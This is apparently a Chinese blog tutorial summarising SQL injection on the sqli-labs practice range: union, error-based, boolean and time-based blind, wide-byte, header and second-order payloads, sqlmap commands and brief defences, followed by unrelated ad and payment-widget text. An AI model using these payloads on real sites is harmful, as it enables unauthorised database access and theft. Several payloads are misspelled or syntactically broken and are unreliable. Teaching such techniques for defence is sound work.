Web安全-sql注入总结

一、简介

了解SQL注入

原理:我都理解是,用户把不合法的语句通过web提交的方式带到数据库中执行(SQL语句),不按照设计者的设计思维进行数据查询,从而获得自己想要的数据。web的提交方式为表单、输入域名、页面请求。

危害:sql注入一直是高危漏洞,它可以获取敏感信息、修改信息、脱裤、上传webshell等。

附带上我哥们的所写的原理:

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。

没有对用户的输入输出进行安全过滤,导致后台直接将用户的输入作为SQL语句的一部分,执行操作,产生危害

通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

注入分类

按变量类型分:数字型和字符型

按HTTP提交方式分:POST注入、GET注入和Cookie注入

按注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入

二、基本的注入流程

基本语句

最常用的查询语句无非就是:

查表selcet table_name from information_schema.tables where table_schema=database()
查库select column_name from information_schema.columns where culomn_schema=表 and table_schema=database()

手工注入

大部分以sqli-labs靶场为例,可能会结合CTF例题

判断注入点:进行闭合,判断是数字型还是字符型,通常都是单双引号和括号。

注释:一般我都是用 --+来注释 注意:DVWA靶场要用#来注释

判断字段: order by 5 (利用半分法来做)
在这里插入图片描述

查看可回显字段:

and 1=2 union select 1,2,3--+   //and 1=2 条件为假,,显示出可回显字段

在这里插入图片描述

知道可显字段后,收集一些数据库的信息,版本号、用户等。
在这里插入图片描述

查看当前数据库database()   用户 user()
版本号 version()

下一步就该查表了 这里要用到group_concat这个函数,用法可以参考一下手册

and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--

在这里插入图片描述

查字段 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

在这里插入图片描述

查字段  union select 1,group_concat(username),group_concat(password) from users--+

在这里插入图片描述

宽字节

数据库大多数为GBK才可以,是由编码在转码的时候导致的。

1%df' and 1=1   1%bb' and 1=1

报错注入

报错注入简单理解就是利用错的数据带出你想要的数据

如果有兴趣可以读一下《代码审计——企业级web代码审计安全架构》上面写了10中方法,其他两种网上收集,其中用的最多的是前三种

floor报错,注入语句如下:
and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)

ExtractValue报错,注入语句如下:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

UpdateXml报错,注入语句如下:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

NAME_CONST报错,注入语句如下:
and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

join报错,注入语句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;

exp报错,注入语句如下:
and exp(~(select * from (select user () ) a) );

GeometryCollection()报错,注入语句如下:
and GeometryCollection((select *from(select from(select user () )a)b ));

polygon ()报错,注入语句如下:
and polygon (()select * from(select user ())a)b );

multipoint ()报错,注入语句如下:
and multipoint (()select * from(select user() )a)b );

multlinestring ()报错,注入语句如下:
and multlinestring (()select * from(select user () )a)b );

multpolygon ()报错,注入语句如下:
and multpolygon (()select * from(select user () )a)b );

linestring ()报错,注入语句如下:
and linestring (()select * from(select user() )a)b );

盲注

先介绍几个函数

length()计算数据库长度 substr()截取字符串 ascii()函数

布尔型

简单理解就是:成功会显示正确内容,失败显示非正常内容。

在这里插入图片描述

id=1'and length(database())=8--+    //数据库长度为8,可以看一下下面的图参考

在这里插入图片描述

id=1' and(ascii(substr(database(),1,1)))=115--+
id=1' and(ascii(substr(database(),2,1)))=101--+
id=1' and(ascii(substr(database(),3,1)))=99--+      //又能力写脚本,不行用Burp

在这里插入图片描述

接着判断表名了,我把公式写下来大家自己套把

判断长度and length(payload)=8--+
猜库表  and(ascii(substr(payload,1,1)))=ascii值--+   //这里用基本语句猜
时间盲注

时间盲注判断也就是根据返回时间进行判断,常用的sleep函数和if语句

判断:'and if(1 =0,1,sleep(5)) --+
      and sleep(5)--+

在这里插入图片描述

判断库:and if(length(database())=长度,sleep(10),1)--+
判断数据 and if(ascii(substr(database(),1,1))=115,slepp(10),1)--+ 
跟上面基本一样,就是利用if语句和sleep函数   //sleep设置3到5秒即可,不要太长

cookie、XFF、User-Agent注入

这些注入需要利用burp抓包

X-Forward-For:127.0.0.1' select 1,2,user()

内联注入

举例:id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3
//利用别名
union select 1,2,3,4,a.id,b.id,* from(sys_admin as a inner join sys_admin as b on a.id=b.id)

二次注入

在存入数据库的时候做了过滤,但是取出来的时候没有做过滤,而产生的数据库注入。

其他注入

还有DNS_log注入、堆叠注入、order by 注入、图片注入等等,我是不想写了。。。

三、最后总结

sqlmap基本使用

基本使用
GET sqlmap -u "url" //这个URL必须含?
POST sqlmap -u “url” --data "POST数据"
cookie sqlmap -u "url" --cookie "chsadj" --level 2 //这里的URL去掉?及其后的内容,并将它们放在cookie的内容里面
sqlmap.py -url   判断注入点
sqlmap.py -u 地址 --dbs   列出所有库
sqlmap.py -u 地址 -D 库 --tables   列出表
sqlmap.py -u 地址 -D 库 -T 表 --columns    字段
sqlmap.py -u 地址 -D 库 -T 表 -C  字段 --dump  数据
sqlmap.py -m url.txt //url
sqlmap.py -r get.txt  //HTTP请求
sqlmap.py -u”地址″ –tamper “脚本”
sqlmap.py -u URL –data“username=a&password=a” //指定表单注入

SQL防御

1.对用户输入的内容进行转义

2.限制关键字的输入,如单引号、双引号、右括号等,限制输入的长度

3.使用SQL语句预处理,对SQL语句进行预编译,然后进行参数绑定,最后传入参数

4.添加WAF,防火墙等

写的有点累,我也懒,给大家附带几篇师傅们写的吧

https://xz.aliyun.com/t/6677#toc-14

https://xz.aliyun.com/t/5878#toc-8

https://www.cnblogs.com/-chenxs/p/11614129.html

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【优质项目推荐】 1、项目代码均经过严格本地测试,运行OK,确保功能稳定后才上传平台。可放心下载并立即投入使用,若遇到任何使用问题,随时欢迎私信反馈与沟通,博主会第一时间回复。 2、项目适用于计算机相关专业(如计科、信息安全、数据科学、人工智能、通信、物联网、自动化、电子信息等)的在校学生、专业教师,或企业员工,小白入门等都适用。 3、该项目不仅具有很高的学习借鉴价值,对于初学者来说,也是入门进阶的绝佳选择;当然也可以直接用于 毕设、课设、期末大作业或项目初期立项演示等。 3、开放创新:如果您有一定基础,且热爱探索钻研,可以在此代码基础上二次开发,进行修改、扩展,创造出属于自己的独特应用。 欢迎下载使用优质资源!欢迎借鉴使用,并欢迎学习交流,共同探索编程的无穷魅力! 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值